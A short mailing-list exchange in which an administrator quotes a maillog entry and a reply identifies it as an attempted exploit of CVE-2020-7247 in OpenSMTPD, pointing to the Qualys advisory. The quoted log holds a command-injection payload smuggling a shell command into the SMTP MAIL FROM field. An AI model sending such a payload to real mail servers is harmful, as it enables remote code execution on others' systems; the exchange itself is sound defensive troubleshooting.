On Wed, Jun 10, 2020 at 10:00:08PM -0500, Edgar Pettijohn wrote: > Saw this in the maillog today. Any ideas what they are trying to do? > > 249c054a86af9328 smtp failed-command command="MAIL FROM: <;for i in 0 1 2 3 > 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>" result="530 5.5.1 Invalid > command: Must issue an AUTH command first"
My guess is that they're trying to exploit CVE-2020-7247. Search the advisory text for that command: https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt Best, Ryan